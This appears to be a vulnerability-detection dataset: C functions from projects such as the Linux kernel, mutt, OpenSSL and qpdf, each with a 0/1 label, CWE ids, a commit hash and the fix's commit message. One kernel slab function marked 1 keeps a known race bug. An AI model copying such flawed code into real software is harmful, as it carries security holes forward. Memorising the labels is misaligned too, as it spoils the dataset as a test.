* mallocx.c (GC_generic_malloc_ignore_off_page): Likewise.
|
zsetalphaisshape(i_ctx_t *i_ctx_p)
{
os_ptr op = osp;
check_type(*op, t_boolean);
gs_setalphaisshape(igs, op->value.boolval);
pop(1);
return 0;
}
| 0 |
[
"CWE-704"
] |
ghostpdl
|
548bb434e81dadcc9f71adf891a3ef5bea8e2b4e
| 35,562,288,107,334,746,000,000,000,000,000,000,000 | 10 |
PS interpreter - add some type checking
These were 'probably' safe anyway, since they mostly treat the objects
as integers without checking, which at least can't result in a crash.
Nevertheless, we ought to check.
The return from comparedictkeys could be wrong if one of the keys had
a value which was not an array, it could incorrectly decide the two
were in fact the same.
|
static NetworkInterface* handle_null_interface(lua_State* vm) {
char allowed_ifname[MAX_INTERFACE_NAME_LEN];
ntop->getTrace()->traceEvent(TRACE_INFO, "NULL interface: did you restart ntopng in the meantime?");
if(ntop->getInterfaceAllowed(vm, allowed_ifname)) {
return ntop->getNetworkInterface(allowed_ifname);
}
return(ntop->getInterfaceAtId(0));
}
| 0 |
[
"CWE-476"
] |
ntopng
|
01f47e04fd7c8d54399c9e465f823f0017069f8f
| 260,240,327,859,568,300,000,000,000,000,000,000,000 | 11 |
Security fix: prevents empty host from being used
|
static int ssl_passwd_cb(char *buf, int size, int rwflag, void *userdata)
{
ACCOUNT *account = (ACCOUNT*)userdata;
if (mutt_account_getuser (account))
return 0;
dprint (2, (debugfile, "ssl_passwd_cb: getting password for %s@%s:%u\n",
account->user, account->host, account->port));
if (mutt_account_getpass (account))
return 0;
return snprintf(buf, size, "%s", account->pass);
}
| 0 |
[
"CWE-74"
] |
mutt
|
c547433cdf2e79191b15c6932c57f1472bfb5ff4
| 232,640,254,045,549,250,000,000,000,000,000,000,000 | 15 |
Fix STARTTLS response injection attack.
Thanks again to Damian Poddebniak and Fabian Ising from the Münster
University of Applied Sciences for reporting this issue. Their
summary in ticket 248 states the issue clearly:
We found another STARTTLS-related issue in Mutt. Unfortunately, it
affects SMTP, POP3 and IMAP.
When the server responds with its "let's do TLS now message", e.g. A
OK begin TLS\r\n in IMAP or +OK begin TLS\r\n in POP3, Mutt will
also read any data after the \r\n and save it into some internal
buffer for later processing. This is problematic, because a MITM
attacker can inject arbitrary responses.
There is a nice blogpost by Wietse Venema about a "command
injection" in postfix (http://www.postfix.org/CVE-2011-0411.html).
What we have here is the problem in reverse, i.e. not a command
injection, but a "response injection."
This commit fixes the issue by clearing the CONNECTION input buffer in
mutt_ssl_starttls().
To make backporting this fix easier, the new functions only clear the
top-level CONNECTION buffer; they don't handle nested buffering in
mutt_zstrm.c or mutt_sasl.c. However both of those wrap the
connection *after* STARTTLS, so this is currently okay. mutt_tunnel.c
occurs before connecting, but it does not perform any nesting.
|
int kmem_cache_alloc_bulk(struct kmem_cache *s, gfp_t flags, size_t size,
void **p)
{
struct kmem_cache_cpu *c;
int i;
/* memcg and kmem_cache debug support */
s = slab_pre_alloc_hook(s, flags);
if (unlikely(!s))
return false;
/*
* Drain objects in the per cpu slab, while disabling local
* IRQs, which protects against PREEMPT and interrupts
* handlers invoking normal fastpath.
*/
local_irq_disable();
c = this_cpu_ptr(s->cpu_slab);
for (i = 0; i < size; i++) {
void *object = c->freelist;
if (unlikely(!object)) {
/*
* Invoking slow path likely have side-effect
* of re-populating per CPU c->freelist
*/
p[i] = ___slab_alloc(s, flags, NUMA_NO_NODE,
_RET_IP_, c);
if (unlikely(!p[i]))
goto error;
c = this_cpu_ptr(s->cpu_slab);
maybe_wipe_obj_freeptr(s, p[i]);
continue; /* goto for-loop */
}
c->freelist = get_freepointer(s, object);
p[i] = object;
maybe_wipe_obj_freeptr(s, p[i]);
}
c->tid = next_tid(c->tid);
local_irq_enable();
/* Clear memory outside IRQ disabled fastpath loop */
if (unlikely(slab_want_init_on_alloc(flags, s))) {
int j;
for (j = 0; j < i; j++)
memset(p[j], 0, s->object_size);
}
/* memcg and kmem_cache debug support */
slab_post_alloc_hook(s, flags, size, p);
return i;
error:
local_irq_enable();
slab_post_alloc_hook(s, flags, i, p);
__kmem_cache_free_bulk(s, i, p);
return 0;
}
| 1 |
[] |
linux
|
fd4d9c7d0c71866ec0c2825189ebd2ce35bd95b8
| 124,517,195,750,956,520,000,000,000,000,000,000,000 | 60 |
mm: slub: add missing TID bump in kmem_cache_alloc_bulk()
When kmem_cache_alloc_bulk() attempts to allocate N objects from a percpu
freelist of length M, and N > M > 0, it will first remove the M elements
from the percpu freelist, then call ___slab_alloc() to allocate the next
element and repopulate the percpu freelist. ___slab_alloc() can re-enable
IRQs via allocate_slab(), so the TID must be bumped before ___slab_alloc()
to properly commit the freelist head change.
Fix it by unconditionally bumping c->tid when entering the slowpath.
Cc: [email protected]
Fixes: ebe909e0fdb3 ("slub: improve bulk alloc strategy")
Signed-off-by: Jann Horn <[email protected]>
Signed-off-by: Linus Torvalds <[email protected]>
|
static void test_ts()
{
MYSQL_STMT *stmt;
MYSQL_BIND my_bind[6];
MYSQL_TIME ts;
MYSQL_RES *prep_res;
char strts[30];
ulong length;
int rc, field_count;
char name;
char query[MAX_TEST_QUERY_LENGTH];
const char *queries [3]= {"SELECT a, b, c FROM test_ts WHERE %c=?",
"SELECT a, b, c FROM test_ts WHERE %c=CAST(? AS TIME)",
"SELECT a, b, c FROM test_ts WHERE %c=CAST(? AS DATE)"};
myheader("test_ts");
rc= mysql_query(mysql, "DROP TABLE IF EXISTS test_ts");
myquery(rc);
rc= mysql_query(mysql, "CREATE TABLE test_ts(a DATE, b TIME, c TIMESTAMP)");
myquery(rc);
stmt= mysql_simple_prepare(mysql, "INSERT INTO test_ts VALUES(?, ?, ?), (?, ?, ?)");
check_stmt(stmt);
ts.year= 2003;
ts.month= 07;
ts.day= 12;
ts.hour= 21;
ts.minute= 07;
ts.second= 46;
ts.second_part= 0;
length= (long)(strmov(strts, "2003-07-12 21:07:46") - strts);
/*
We need to bzero bind structure because mysql_stmt_bind_param checks all
its members.
*/
bzero((char*) my_bind, sizeof(my_bind));
my_bind[0].buffer_type= MYSQL_TYPE_TIMESTAMP;
my_bind[0].buffer= (void *)&ts;
my_bind[0].buffer_length= sizeof(ts);
my_bind[2]= my_bind[1]= my_bind[0];
my_bind[3].buffer_type= MYSQL_TYPE_STRING;
my_bind[3].buffer= (void *)strts;
my_bind[3].buffer_length= sizeof(strts);
my_bind[3].length= &length;
my_bind[5]= my_bind[4]= my_bind[3];
rc= mysql_stmt_bind_param(stmt, my_bind);
check_execute(stmt, rc);
rc= mysql_stmt_execute(stmt);
check_execute(stmt, rc);
mysql_stmt_close(stmt);
verify_col_data("test_ts", "a", "2003-07-12");
verify_col_data("test_ts", "b", "21:07:46");
verify_col_data("test_ts", "c", "2003-07-12 21:07:46");
stmt= mysql_simple_prepare(mysql, "SELECT * FROM test_ts");
check_stmt(stmt);
prep_res= mysql_stmt_result_metadata(stmt);
mytest(prep_res);
rc= mysql_stmt_execute(stmt);
check_execute(stmt, rc);
rc= my_process_stmt_result(stmt);
DIE_UNLESS(rc == 2);
field_count= mysql_num_fields(prep_res);
mysql_free_result(prep_res);
mysql_stmt_close(stmt);
for (name= 'a'; field_count--; name++)
{
int row_count= 0;
sprintf(query, queries[field_count], name);
if (!opt_silent)
fprintf(stdout, "\n %s", query);
stmt= mysql_simple_prepare(mysql, query);
check_stmt(stmt);
rc= mysql_stmt_bind_param(stmt, my_bind);
check_execute(stmt, rc);
rc= mysql_stmt_execute(stmt);
check_execute(stmt, rc);
while (mysql_stmt_fetch(stmt) == 0)
row_count++;
if (!opt_silent)
fprintf(stdout, "\n returned '%d' rows", row_count);
DIE_UNLESS(row_count == 2);
mysql_stmt_close(stmt);
}
}
| 0 |
[
"CWE-416"
] |
server
|
eef21014898d61e77890359d6546d4985d829ef6
| 69,850,087,374,890,800,000,000,000,000,000,000,000 | 107 |
MDEV-11933 Wrong usage of linked list in mysql_prune_stmt_list
mysql_prune_stmt_list() was walking the list following
element->next pointers, but inside the loop it was invoking
list_add(element) that modified element->next. So, mysql_prune_stmt_list()
failed to visit and reset all elements, and some of them were left
with pointers to invalid MYSQL.
|
void qpdf_set_object_stream_mode(qpdf_data qpdf, qpdf_object_stream_e mode)
{
QTC::TC("qpdf", "qpdf-c called qpdf_set_object_stream_mode");
qpdf->qpdf_writer->setObjectStreamMode(mode);
}
| 0 |
[
"CWE-787"
] |
qpdf
|
d71f05ca07eb5c7cfa4d6d23e5c1f2a800f52e8e
| 213,839,327,226,694,700,000,000,000,000,000,000,000 | 5 |
Fix sign and conversion warnings (major)
This makes all integer type conversions that have potential data loss
explicit with calls that do range checks and raise an exception. After
this commit, qpdf builds with no warnings when -Wsign-conversion
-Wconversion is used with gcc or clang or when -W3 -Wd4800 is used
with MSVC. This significantly reduces the likelihood of potential
crashes from bogus integer values.
There are some parts of the code that take int when they should take
size_t or an offset. Such places would make qpdf not support files
with more than 2^31 of something that usually wouldn't be so large. In
the event that such a file shows up and is valid, at least qpdf would
raise an error in the right spot so the issue could be legitimately
addressed rather than failing in some weird way because of a silent
overflow condition.
|
static ssize_t qcow_preadv(struct bdev *bdev, struct iovec *iov, int iovcnt, off_t offset)
{
uint64_t cluster_offset;
uint64_t sector_index;
uint64_t sector_count;
uint64_t sector_num, n;
ssize_t read;
struct qcow_state *s = bdev->private;
struct iovec _iov[iovcnt];
size_t _cnt;
size_t _off = 0;
size_t count = tcmu_iovec_length(iov, iovcnt);
assert(!(count & 511));
sector_count = count / 512;
sector_num = offset >> 9;
while (sector_count) {
sector_index = sector_num & (s->cluster_sectors - 1);
n = min(sector_count, (s->cluster_sectors - sector_index));
_cnt = iovec_segment(iov, _iov, _off, n * 512);
cluster_offset = get_cluster_offset(s, sector_num << 9, false);
if (!cluster_offset) {
if (!s->backing_image) {
/* read unallocated sectors as 0s */
iovec_memset(_iov, _cnt, 0, 512 * n);
} else {
/* pass through to backing file */
read = s->backing_image->ops->preadv(s->backing_image,
_iov, _cnt,
(off_t) sector_num * 512);
if (read != n * 512)
break;
}
} else if (cluster_offset == QCOW2_OFLAG_ZERO) {
/* cluster discarded, read as 0s */
iovec_memset(_iov, _cnt, 0, 512 * n);
} else if (cluster_offset & s->cluster_compressed) {
if (decompress_cluster(s, cluster_offset) < 0) {
tcmu_err("decompression failure\n");
return -1;
}
tcmu_memcpy_into_iovec(_iov, _cnt, s->cluster_cache + sector_index * 512, 512 * n);
} else {
read = preadv(bdev->fd, _iov, _cnt, cluster_offset + (sector_index * 512));
if (read != n * 512)
break;
}
sector_count -= n;
sector_num += n;
_off += n * 512;
}
return _off ? _off : -1;
}
| 0 |
[
"CWE-200"
] |
tcmu-runner
|
8cf8208775022301adaa59c240bb7f93742d1329
| 301,223,770,518,275,300,000,000,000,000,000,000,000 | 59 |
removed all check_config callback implementations to avoid security issues
see github issue #194
qcow.c contained an information leak, could test for existance of any
file in the system
file_example.c and file_optical.c allow also to test for existance of
any file, plus to temporarily create empty new files anywhere in the
file system. This also involves a race condition, if a file didn't exist
in the first place, but would be created in-between by some other
process, then the file would be deleted by the check_config
implementation.
|
void cfg80211_sta_opmode_change_notify(struct net_device *dev, const u8 *mac,
struct sta_opmode_info *sta_opmode,
gfp_t gfp)
{
struct sk_buff *msg;
struct wireless_dev *wdev = dev->ieee80211_ptr;
struct cfg80211_registered_device *rdev = wiphy_to_rdev(wdev->wiphy);
void *hdr;
if (WARN_ON(!mac))
return;
msg = nlmsg_new(NLMSG_DEFAULT_SIZE, gfp);
if (!msg)
return;
hdr = nl80211hdr_put(msg, 0, 0, 0, NL80211_CMD_STA_OPMODE_CHANGED);
if (!hdr) {
nlmsg_free(msg);
return;
}
if (nla_put_u32(msg, NL80211_ATTR_WIPHY, rdev->wiphy_idx))
goto nla_put_failure;
if (nla_put_u32(msg, NL80211_ATTR_IFINDEX, dev->ifindex))
goto nla_put_failure;
if (nla_put(msg, NL80211_ATTR_MAC, ETH_ALEN, mac))
goto nla_put_failure;
if ((sta_opmode->changed & STA_OPMODE_SMPS_MODE_CHANGED) &&
nla_put_u8(msg, NL80211_ATTR_SMPS_MODE, sta_opmode->smps_mode))
goto nla_put_failure;
if ((sta_opmode->changed & STA_OPMODE_MAX_BW_CHANGED) &&
nla_put_u8(msg, NL80211_ATTR_CHANNEL_WIDTH, sta_opmode->bw))
goto nla_put_failure;
if ((sta_opmode->changed & STA_OPMODE_N_SS_CHANGED) &&
nla_put_u8(msg, NL80211_ATTR_NSS, sta_opmode->rx_nss))
goto nla_put_failure;
genlmsg_end(msg, hdr);
genlmsg_multicast_netns(&nl80211_fam, wiphy_net(&rdev->wiphy), msg, 0,
NL80211_MCGRP_MLME, gfp);
return;
nla_put_failure:
nlmsg_free(msg);
}
| 0 |
[
"CWE-120"
] |
linux
|
f88eb7c0d002a67ef31aeb7850b42ff69abc46dc
| 255,396,611,251,205,020,000,000,000,000,000,000,000 | 53 |
nl80211: validate beacon head
We currently don't validate the beacon head, i.e. the header,
fixed part and elements that are to go in front of the TIM
element. This means that the variable elements there can be
malformed, e.g. have a length exceeding the buffer size, but
most downstream code from this assumes that this has already
been checked.
Add the necessary checks to the netlink policy.
Cc: [email protected]
Fixes: ed1b6cc7f80f ("cfg80211/nl80211: add beacon settings")
Link: https://lore.kernel.org/r/1569009255-I7ac7fbe9436e9d8733439eab8acbbd35e55c74ef@changeid
Signed-off-by: Johannes Berg <[email protected]>
|
static void corsair_remove(struct hid_device *dev)
{
k90_cleanup_macro_functions(dev);
k90_cleanup_backlight(dev);
hid_hw_stop(dev);
}
| 0 |
[
"CWE-399",
"CWE-119"
] |
linux
|
6d104af38b570d37aa32a5803b04c354f8ed513d
| 252,656,821,011,667,400,000,000,000,000,000,000,000 | 7 |
HID: corsair: fix DMA buffers on stack
Not all platforms support DMA to the stack, and specifically since v4.9
this is no longer supported on x86 with VMAP_STACK either.
Note that the macro-mode buffer was larger than necessary.
Fixes: 6f78193ee9ea ("HID: corsair: Add Corsair Vengeance K90 driver")
Cc: stable <[email protected]>
Signed-off-by: Johan Hovold <[email protected]>
Signed-off-by: Jiri Kosina <[email protected]>
|
static void __io_fail_links(struct io_kiocb *req)
{
struct io_ring_ctx *ctx = req->ctx;
while (!list_empty(&req->link_list)) {
struct io_kiocb *link = list_first_entry(&req->link_list,
struct io_kiocb, link_list);
list_del_init(&link->link_list);
trace_io_uring_fail_link(req, link);
io_cqring_fill_event(link, -ECANCELED);
link->flags |= REQ_F_COMP_LOCKED;
__io_double_put_req(link);
req->flags &= ~REQ_F_LINK_TIMEOUT;
}
io_commit_cqring(ctx);
io_cqring_ev_posted(ctx);
}
| 0 |
[] |
linux
|
0f2122045b946241a9e549c2a76cea54fa58a7ff
| 333,801,506,736,109,130,000,000,000,000,000,000,000 | 20 |
io_uring: don't rely on weak ->files references
Grab actual references to the files_struct. To avoid circular references
issues due to this, we add a per-task note that keeps track of what
io_uring contexts a task has used. When the tasks execs or exits its
assigned files, we cancel requests based on this tracking.
With that, we can grab proper references to the files table, and no
longer need to rely on stashing away ring_fd and ring_file to check
if the ring_fd may have been closed.
Cc: [email protected] # v5.5+
Reviewed-by: Pavel Begunkov <[email protected]>
Signed-off-by: Jens Axboe <[email protected]>
|
static void sctp_do_8_2_transport_strike(sctp_cmd_seq_t *commands,
struct sctp_association *asoc,
struct sctp_transport *transport,
int is_hb)
{
/* The check for association's overall error counter exceeding the
* threshold is done in the state function.
*/
/* We are here due to a timer expiration. If the timer was
* not a HEARTBEAT, then normal error tracking is done.
* If the timer was a heartbeat, we only increment error counts
* when we already have an outstanding HEARTBEAT that has not
* been acknowledged.
* Additionally, some tranport states inhibit error increments.
*/
if (!is_hb) {
asoc->overall_error_count++;
if (transport->state != SCTP_INACTIVE)
transport->error_count++;
} else if (transport->hb_sent) {
if (transport->state != SCTP_UNCONFIRMED)
asoc->overall_error_count++;
if (transport->state != SCTP_INACTIVE)
transport->error_count++;
}
/* If the transport error count is greater than the pf_retrans
* threshold, and less than pathmaxrtx, then mark this transport
* as Partially Failed, ee SCTP Quick Failover Draft, secon 5.1,
* point 1
*/
if ((transport->state != SCTP_PF) &&
(asoc->pf_retrans < transport->pathmaxrxt) &&
(transport->error_count > asoc->pf_retrans)) {
sctp_assoc_control_transport(asoc, transport,
SCTP_TRANSPORT_PF,
0);
/* Update the hb timer to resend a heartbeat every rto */
sctp_cmd_hb_timer_update(commands, transport);
}
if (transport->state != SCTP_INACTIVE &&
(transport->error_count > transport->pathmaxrxt)) {
SCTP_DEBUG_PRINTK_IPADDR("transport_strike:association %p",
" transport IP: port:%d failed.\n",
asoc,
(&transport->ipaddr),
ntohs(transport->ipaddr.v4.sin_port));
sctp_assoc_control_transport(asoc, transport,
SCTP_TRANSPORT_DOWN,
SCTP_FAILED_THRESHOLD);
}
/* E2) For the destination address for which the timer
* expires, set RTO <- RTO * 2 ("back off the timer"). The
* maximum value discussed in rule C7 above (RTO.max) may be
* used to provide an upper bound to this doubling operation.
*
* Special Case: the first HB doesn't trigger exponential backoff.
* The first unacknowledged HB triggers it. We do this with a flag
* that indicates that we have an outstanding HB.
*/
if (!is_hb || transport->hb_sent) {
transport->rto = min((transport->rto * 2), transport->asoc->rto_max);
sctp_max_rto(asoc, transport);
}
}
| 0 |
[] |
linux
|
196d67593439b03088913227093e374235596e33
| 225,117,006,226,926,300,000,000,000,000,000,000,000 | 69 |
sctp: Add support to per-association statistics via a new SCTP_GET_ASSOC_STATS call
The current SCTP stack is lacking a mechanism to have per association
statistics. This is an implementation modeled after OpenSolaris'
SCTP_GET_ASSOC_STATS.
Userspace part will follow on lksctp if/when there is a general ACK on
this.
V4:
- Move ipackets++ before q->immediate.func() for consistency reasons
- Move sctp_max_rto() at the end of sctp_transport_update_rto() to avoid
returning bogus RTO values
- return asoc->rto_min when max_obs_rto value has not changed
V3:
- Increase ictrlchunks in sctp_assoc_bh_rcv() as well
- Move ipackets++ to sctp_inq_push()
- return 0 when no rto updates took place since the last call
V2:
- Implement partial retrieval of stat struct to cope for future expansion
- Kill the rtxpackets counter as it cannot be precise anyway
- Rename outseqtsns to outofseqtsns to make it clearer that these are out
of sequence unexpected TSNs
- Move asoc->ipackets++ under a lock to avoid potential miscounts
- Fold asoc->opackets++ into the already existing asoc check
- Kill unneeded (q->asoc) test when increasing rtxchunks
- Do not count octrlchunks if sending failed (SCTP_XMIT_OK != 0)
- Don't count SHUTDOWNs as SACKs
- Move SCTP_GET_ASSOC_STATS to the private space API
- Adjust the len check in sctp_getsockopt_assoc_stats() to allow for
future struct growth
- Move association statistics in their own struct
- Update idupchunks when we send a SACK with dup TSNs
- return min_rto in max_rto when RTO has not changed. Also return the
transport when max_rto last changed.
Signed-off: Michele Baldessari <[email protected]>
Acked-by: Vlad Yasevich <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
X509_NAME *X509_get_subject_name(const X509 *a)
{
return a->cert_info.subject;
}
| 0 |
[
"CWE-476"
] |
openssl
|
8130d654d1de922ea224fa18ee3bc7262edc39c0
| 202,691,688,698,398,660,000,000,000,000,000,000,000 | 4 |
Fix Null pointer deref in X509_issuer_and_serial_hash()
The OpenSSL public API function X509_issuer_and_serial_hash() attempts
to create a unique hash value based on the issuer and serial number data
contained within an X509 certificate. However it fails to correctly
handle any errors that may occur while parsing the issuer field (which
might occur if the issuer field is maliciously constructed). This may
subsequently result in a NULL pointer deref and a crash leading to a
potential denial of service attack.
The function X509_issuer_and_serial_hash() is never directly called by
OpenSSL itself so applications are only vulnerable if they use this
function directly and they use it on certificates that may have been
obtained from untrusted sources.
CVE-2021-23841
Reviewed-by: Richard Levitte <[email protected]>
Reviewed-by: Paul Dale <[email protected]>
|
int btrfs_commit_transaction_async(struct btrfs_trans_handle *trans)
{
struct btrfs_fs_info *fs_info = trans->fs_info;
struct btrfs_async_commit *ac;
struct btrfs_transaction *cur_trans;
ac = kmalloc(sizeof(*ac), GFP_NOFS);
if (!ac)
return -ENOMEM;
INIT_WORK(&ac->work, do_async_commit);
ac->newtrans = btrfs_join_transaction(trans->root);
if (IS_ERR(ac->newtrans)) {
int err = PTR_ERR(ac->newtrans);
kfree(ac);
return err;
}
/* take transaction reference */
cur_trans = trans->transaction;
refcount_inc(&cur_trans->use_count);
btrfs_end_transaction(trans);
/*
* Tell lockdep we've released the freeze rwsem, since the
* async commit thread will be the one to unlock it.
*/
if (ac->newtrans->type & __TRANS_FREEZABLE)
__sb_writers_release(fs_info->sb, SB_FREEZE_FS);
schedule_work(&ac->work);
/*
* Wait for the current transaction commit to start and block
* subsequent transaction joins
*/
wait_event(fs_info->transaction_blocked_wait,
cur_trans->state >= TRANS_STATE_COMMIT_START ||
TRANS_ABORTED(cur_trans));
if (current->journal_info == trans)
current->journal_info = NULL;
btrfs_put_transaction(cur_trans);
return 0;
}
| 0 |
[
"CWE-703",
"CWE-667"
] |
linux
|
1cb3db1cf383a3c7dbda1aa0ce748b0958759947
| 145,435,962,710,360,150,000,000,000,000,000,000,000 | 45 |
btrfs: fix deadlock with concurrent chunk allocations involving system chunks
When a task attempting to allocate a new chunk verifies that there is not
currently enough free space in the system space_info and there is another
task that allocated a new system chunk but it did not finish yet the
creation of the respective block group, it waits for that other task to
finish creating the block group. This is to avoid exhaustion of the system
chunk array in the superblock, which is limited, when we have a thundering
herd of tasks allocating new chunks. This problem was described and fixed
by commit eafa4fd0ad0607 ("btrfs: fix exhaustion of the system chunk array
due to concurrent allocations").
However there are two very similar scenarios where this can lead to a
deadlock:
1) Task B allocated a new system chunk and task A is waiting on task B
to finish creation of the respective system block group. However before
task B ends its transaction handle and finishes the creation of the
system block group, it attempts to allocate another chunk (like a data
chunk for an fallocate operation for a very large range). Task B will
be unable to progress and allocate the new chunk, because task A set
space_info->chunk_alloc to 1 and therefore it loops at
btrfs_chunk_alloc() waiting for task A to finish its chunk allocation
and set space_info->chunk_alloc to 0, but task A is waiting on task B
to finish creation of the new system block group, therefore resulting
in a deadlock;
2) Task B allocated a new system chunk and task A is waiting on task B to
finish creation of the respective system block group. By the time that
task B enter the final phase of block group allocation, which happens
at btrfs_create_pending_block_groups(), when it modifies the extent
tree, the device tree or the chunk tree to insert the items for some
new block group, it needs to allocate a new chunk, so it ends up at
btrfs_chunk_alloc() and keeps looping there because task A has set
space_info->chunk_alloc to 1, but task A is waiting for task B to
finish creation of the new system block group and release the reserved
system space, therefore resulting in a deadlock.
In short, the problem is if a task B needs to allocate a new chunk after
it previously allocated a new system chunk and if another task A is
currently waiting for task B to complete the allocation of the new system
chunk.
Unfortunately this deadlock scenario introduced by the previous fix for
the system chunk array exhaustion problem does not have a simple and short
fix, and requires a big change to rework the chunk allocation code so that
chunk btree updates are all made in the first phase of chunk allocation.
And since this deadlock regression is being frequently hit on zoned
filesystems and the system chunk array exhaustion problem is triggered
in more extreme cases (originally observed on PowerPC with a node size
of 64K when running the fallocate tests from stress-ng), revert the
changes from that commit. The next patch in the series, with a subject
of "btrfs: rework chunk allocation to avoid exhaustion of the system
chunk array" does the necessary changes to fix the system chunk array
exhaustion problem.
Reported-by: Naohiro Aota <[email protected]>
Link: https://lore.kernel.org/linux-btrfs/20210621015922.ewgbffxuawia7liz@naota-xeon/
Fixes: eafa4fd0ad0607 ("btrfs: fix exhaustion of the system chunk array due to concurrent allocations")
CC: [email protected] # 5.12+
Tested-by: Shin'ichiro Kawasaki <[email protected]>
Tested-by: Naohiro Aota <[email protected]>
Signed-off-by: Filipe Manana <[email protected]>
Tested-by: David Sterba <[email protected]>
Signed-off-by: David Sterba <[email protected]>
|
WandExport void DrawAlpha(DrawingWand *wand,const double x,const double y,
const PaintMethod paint_method)
{
assert(wand != (DrawingWand *) NULL);
assert(wand->signature == MagickWandSignature);
if (wand->debug != MagickFalse)
(void) LogMagickEvent(WandEvent,GetMagickModule(),"%s",wand->name);
(void) MVGPrintf(wand,"alpha %.20g %.20g '%s'\n",x,y,CommandOptionToMnemonic(
MagickMethodOptions,(ssize_t) paint_method));
}
| 0 |
[
"CWE-476"
] |
ImageMagick
|
6ad5fc3c9b652eec27fc0b1a0817159f8547d5d9
| 18,295,180,073,028,640,000,000,000,000,000,000,000 | 10 |
https://github.com/ImageMagick/ImageMagick/issues/716
|
static inline void enable_eprom_write(pegasus_t *pegasus)
{
__u8 tmp;
get_registers(pegasus, EthCtrl2, 1, &tmp);
set_register(pegasus, EthCtrl2, tmp | EPROM_WR_ENABLE);
}
| 0 |
[
"CWE-119",
"CWE-284"
] |
linux
|
5593523f968bc86d42a035c6df47d5e0979b5ace
| 280,623,569,247,627,300,000,000,000,000,000,000,000 | 7 |
pegasus: Use heap buffers for all register access
Allocating USB buffers on the stack is not portable, and no longer
works on x86_64 (with VMAP_STACK enabled as per default).
Fixes: 1da177e4c3f4 ("Linux-2.6.12-rc2")
References: https://bugs.debian.org/852556
Reported-by: Lisandro Damián Nicanor Pérez Meyer <[email protected]>
Tested-by: Lisandro Damián Nicanor Pérez Meyer <[email protected]>
Signed-off-by: Ben Hutchings <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
nm_utils_read_link_absolute(const char *link_file, GError **error)
{
char *ln, *dirname, *ln_abs;
ln = g_file_read_link(link_file, error);
if (!ln)
return NULL;
if (g_path_is_absolute(ln))
return ln;
dirname = g_path_get_dirname(link_file);
if (!g_path_is_absolute(dirname)) {
gs_free char *current_dir = g_get_current_dir();
/* @link_file argument was not an absolute path in the first place.
* That actually may be a bug, because the CWD is not well defined
* in most cases. Anyway, apparently we were able to load the file
* even from a relative path. So, when making the link absolute, we
* also need to prepend the CWD. */
ln_abs = g_build_filename(current_dir, dirname, ln, NULL);
} else
ln_abs = g_build_filename(dirname, ln, NULL);
g_free(dirname);
g_free(ln);
return ln_abs;
}
| 0 |
[
"CWE-20"
] |
NetworkManager
|
420784e342da4883f6debdfe10cde68507b10d27
| 327,964,475,373,399,780,000,000,000,000,000,000,000 | 26 |
core: fix crash in nm_wildcard_match_check()
It's not entirely clear how to treat %NULL.
Clearly "match.interface-name=eth0" should not
match with an interface %NULL. But what about
"match.interface-name=!eth0"? It's now implemented
that negative matches still succeed against %NULL.
What about "match.interface-name=*"? That probably
should also match with %NULL. So we treat %NULL really
like "".
Against commit 11cd443448bc ('iwd: Don't call IWD methods when device
unmanaged'), we got this backtrace:
#0 0x00007f1c164069f1 in __strnlen_avx2 () at ../sysdeps/x86_64/multiarch/strlen-avx2.S:62
#1 0x00007f1c1637ac9e in __fnmatch (pattern=<optimized out>, string=<optimized out>, string@entry=0x0, flags=flags@entry=0) at fnmatch.c:379
p = 0x0
res = <optimized out>
orig_pattern = <optimized out>
n = <optimized out>
wpattern = 0x7fff8d860730 L"pci-0000:03:00.0"
ps = {__count = 0, __value = {__wch = 0, __wchb = "\000\000\000"}}
wpattern_malloc = 0x0
wstring_malloc = 0x0
wstring = <optimized out>
alloca_used = 80
__PRETTY_FUNCTION__ = "__fnmatch"
#2 0x0000564484a978bf in nm_wildcard_match_check (str=0x0, patterns=<optimized out>, num_patterns=<optimized out>) at src/core/nm-core-utils.c:1959
is_inverted = 0
is_mandatory = 0
match = <optimized out>
p = 0x564486c43fa0 "pci-0000:03:00.0"
has_optional = 0
has_any_optional = 0
i = <optimized out>
#3 0x0000564484bf4797 in check_connection_compatible (self=<optimized out>, connection=<optimized out>, error=0x0) at src/core/devices/nm-device.c:7499
patterns = <optimized out>
device_driver = 0x564486c76bd0 "veth"
num_patterns = 1
priv = 0x564486cbe0b0
__func__ = "check_connection_compatible"
device_iface = <optimized out>
local = 0x564486c99a60
conn_iface = 0x0
klass = <optimized out>
s_match = 0x564486c63df0 [NMSettingMatch]
#4 0x0000564484c38491 in check_connection_compatible (device=0x564486cbe590 [NMDeviceVeth], connection=0x564486c6b160, error=0x0) at src/core/devices/nm-device-ethernet.c:348
self = 0x564486cbe590 [NMDeviceVeth]
s_wired = <optimized out>
Fixes: 3ced486f4162 ('libnm/match: extend syntax for match patterns with '|', '&', '!' and '\\'')
https://bugzilla.redhat.com/show_bug.cgi?id=1942741
|
irc_nick_valid (struct t_irc_channel *channel, struct t_irc_nick *nick)
{
struct t_irc_nick *ptr_nick;
if (!channel || !nick)
return 0;
for (ptr_nick = channel->nicks; ptr_nick; ptr_nick = ptr_nick->next_nick)
{
if (ptr_nick == nick)
return 1;
}
/* nick not found */
return 0;
}
| 0 |
[
"CWE-120",
"CWE-787"
] |
weechat
|
40ccacb4330a64802b1f1e28ed9a6b6d3ca9197f
| 82,895,173,431,155,250,000,000,000,000,000,000,000 | 16 |
irc: fix crash when a new message 005 is received with longer nick prefixes
Thanks to Stuart Nevans Locke for reporting the issue.
|
DLLEXPORT int tjDecompress(tjhandle handle, unsigned char *jpegBuf,
unsigned long jpegSize, unsigned char *dstBuf,
int width, int pitch, int height, int pixelSize,
int flags)
{
if (flags & TJ_YUV)
return tjDecompressToYUV(handle, jpegBuf, jpegSize, dstBuf, flags);
else
return tjDecompress2(handle, jpegBuf, jpegSize, dstBuf, width, pitch,
height, getPixelFormat(pixelSize, flags), flags);
}
| 0 |
[
"CWE-787"
] |
libjpeg-turbo
|
3d9c64e9f8aa1ee954d1d0bb3390fc894bb84da3
| 265,611,439,161,511,630,000,000,000,000,000,000,000 | 11 |
tjLoadImage(): Fix int overflow/segfault w/big BMP
Fixes #304
|
int ssl3_connect(SSL *s)
{
BUF_MEM *buf = NULL;
unsigned long Time = (unsigned long)time(NULL);
void (*cb) (const SSL *ssl, int type, int val) = NULL;
int ret = -1;
int new_state, state, skip = 0;
RAND_add(&Time, sizeof(Time), 0);
ERR_clear_error();
clear_sys_error();
if (s->info_callback != NULL)
cb = s->info_callback;
else if (s->ctx->info_callback != NULL)
cb = s->ctx->info_callback;
s->in_handshake++;
if (!SSL_in_init(s) || SSL_in_before(s))
